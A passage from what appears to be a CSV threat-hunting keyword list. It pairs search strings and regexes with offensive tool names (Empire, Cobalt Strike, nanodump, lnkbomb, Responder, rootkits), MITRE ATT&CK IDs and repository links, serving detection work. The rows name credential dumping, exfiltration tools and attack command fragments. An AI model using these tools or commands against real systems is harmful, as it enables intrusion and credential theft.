T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*ListAllUsers.ps1*",".{0,1000}ListAllUsers\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*ListDescriptionContainsPass*",".{0,1000}ListDescriptionContainsPass.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*listdlls64.exe*",".{0,1000}listdlls64\.exe.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","7","1","54","11","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z" "*ListDomainAdmins*",".{0,1000}ListDomainAdmins.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*ListDomainGroupsLocalAdmin*",".{0,1000}ListDomainGroupsLocalAdmin.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*listen(58082* '0.0.0.0'*",".{0,1000}listen\(58082.{0,1000}\s\'0\.0\.0\.0\'.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*listen_http 0.0.0.0 8080 *.php operation1*",".{0,1000}listen_http\s0\.0\.0\.0\s8080\s.{0,1000}\.php\soperation1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*Listening for incoming ICMP packets...*",".{0,1000}Listening\sfor\sincoming\sICMP\spackets\.\.\..{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*Listening for incoming requests on http://localhost:$port/*",".{0,1000}Listening\sfor\sincoming\srequests\son\shttp\:\/\/localhost\:\$port\/.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*List-GraphRunnerModules*",".{0,1000}List\-GraphRunnerModules.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*ListMetasploitPayloads*",".{0,1000}ListMetasploitPayloads.{0,1000}","offensive_tool_keyword","empire","Empire scripts argument. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ListNeverLoggedInAccounts*",".{0,1000}ListNeverLoggedInAccounts.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*ListPasswordNeverExpire*",".{0,1000}ListPasswordNeverExpire.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*lists.tor2web.org*",".{0,1000}lists\.tor2web\.org.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*ListUsersLastPasswordChange*",".{0,1000}ListUsersLastPasswordChange.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*ListUsersNoPasswordRequired*",".{0,1000}ListUsersNoPasswordRequired.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*ListUsersPasswordMustChange*",".{0,1000}ListUsersPasswordMustChange.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*ListUsersPasswordNotChanged*",".{0,1000}ListUsersPasswordNotChanged.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*litefuzz -lk -c*",".{0,1000}litefuzz\s\-lk\s\-c.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*litefuzz -s -a *",".{0,1000}litefuzz\s\-s\s\-a\s.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*litefuzz* -l -c*",".{0,1000}litefuzz.{0,1000}\s\-l\s\-c.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*litefuzz.py *",".{0,1000}litefuzz\.py\s.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*litefuzz\fuzz.py*",".{0,1000}litefuzz\\fuzz\.py.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*lkarlslund/Adalanche*",".{0,1000}lkarlslund\/Adalanche.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*LKM_HACKING.html*",".{0,1000}LKM_HACKING\.html.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*lkmRootkitmodified*",".{0,1000}lkmRootkitmodified.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*llehsrewop*",".{0,1000}llehsrewop.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed powershell","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*llkat/rsockstun*",".{0,1000}llkat\/rsockstun.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","1","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "*-llmnr -spn '*cifs* -secrets*",".{0,1000}\-llmnr\s\-spn\s\'.{0,1000}cifs.{0,1000}\s\-secrets.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*LLMNR.py*",".{0,1000}LLMNR\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*llmnr_sniffer.py*",".{0,1000}llmnr_sniffer\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*LLMNRSpoofer*",".{0,1000}LLMNRSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*llsrpc_##*",".{0,1000}llsrpc_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*lmhash*aad3b435b51404eeaad3b435b51404ee*",".{0,1000}lmhash.{0,1000}aad3b435b51404eeaad3b435b51404ee.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*L'n', L't', L'd', L'l', L'l', L'.', L'd', L'l', L'l', L'\0'*",".{0,1000}L\'n\',\sL\'t\',\sL\'d\',\sL\'l\',\sL\'l\',\sL\'\.\',\sL\'d\',\sL\'l\',\sL\'l\',\sL\'\\0\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*lnkbomb.py *",".{0,1000}lnkbomb\.py\s.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*lnkbomb-1.0.zip*",".{0,1000}lnkbomb\-1\.0\.zip.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","1","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*lnk-generate.py --host * --type ntlm --output *.lnk*",".{0,1000}lnk\-generate\.py\s\-\-host\s.{0,1000}\s\-\-type\sntlm\s\-\-output\s.{0,1000}\.lnk.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*lnkup.py --*",".{0,1000}lnkup\.py\s\-\-.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","0","N/A","10","4","311","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z" "*lnx_keylogger.py*",".{0,1000}lnx_keylogger\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*load aggressor script*",".{0,1000}load\saggressor\sscript.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","27","4","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z" "*load incognito*",".{0,1000}load\sincognito.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Incognito","10","10","N/A","N/A","N/A","N/A" "*load kiwi*",".{0,1000}load\skiwi.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Mimikatz","10","10","N/A","N/A","N/A","N/A" "*load mimikatz windbg extension, extracts credential from crash dump*",".{0,1000}load\smimikatz\swindbg\sextension,\sextracts\scredential\sfrom\scrash\sdump.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*load_credentials(""credentials.txt"")*",".{0,1000}load_credentials\(\""credentials\.txt\""\).{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","N/A","6","1","N/A","N/A","N/A","N/A" "*load_sc.exe *.bin*",".{0,1000}load_sc\.exe\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","0","N/A","10","10","161","27","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z" "*load_ssp *.dll*",".{0,1000}load_ssp\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*Load-BeaconParameters*",".{0,1000}Load\-BeaconParameters.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","244","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*Load-BetterXencrypt* ",".{0,1000}Load\-BetterXencrypt.{0,1000}\s","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*Load-Bof(*",".{0,1000}Load\-Bof\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","244","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*loaddll64.exe*",".{0,1000}loaddll64\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*loader.x64.exe.exe*",".{0,1000}loader\.x64\.exe\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - 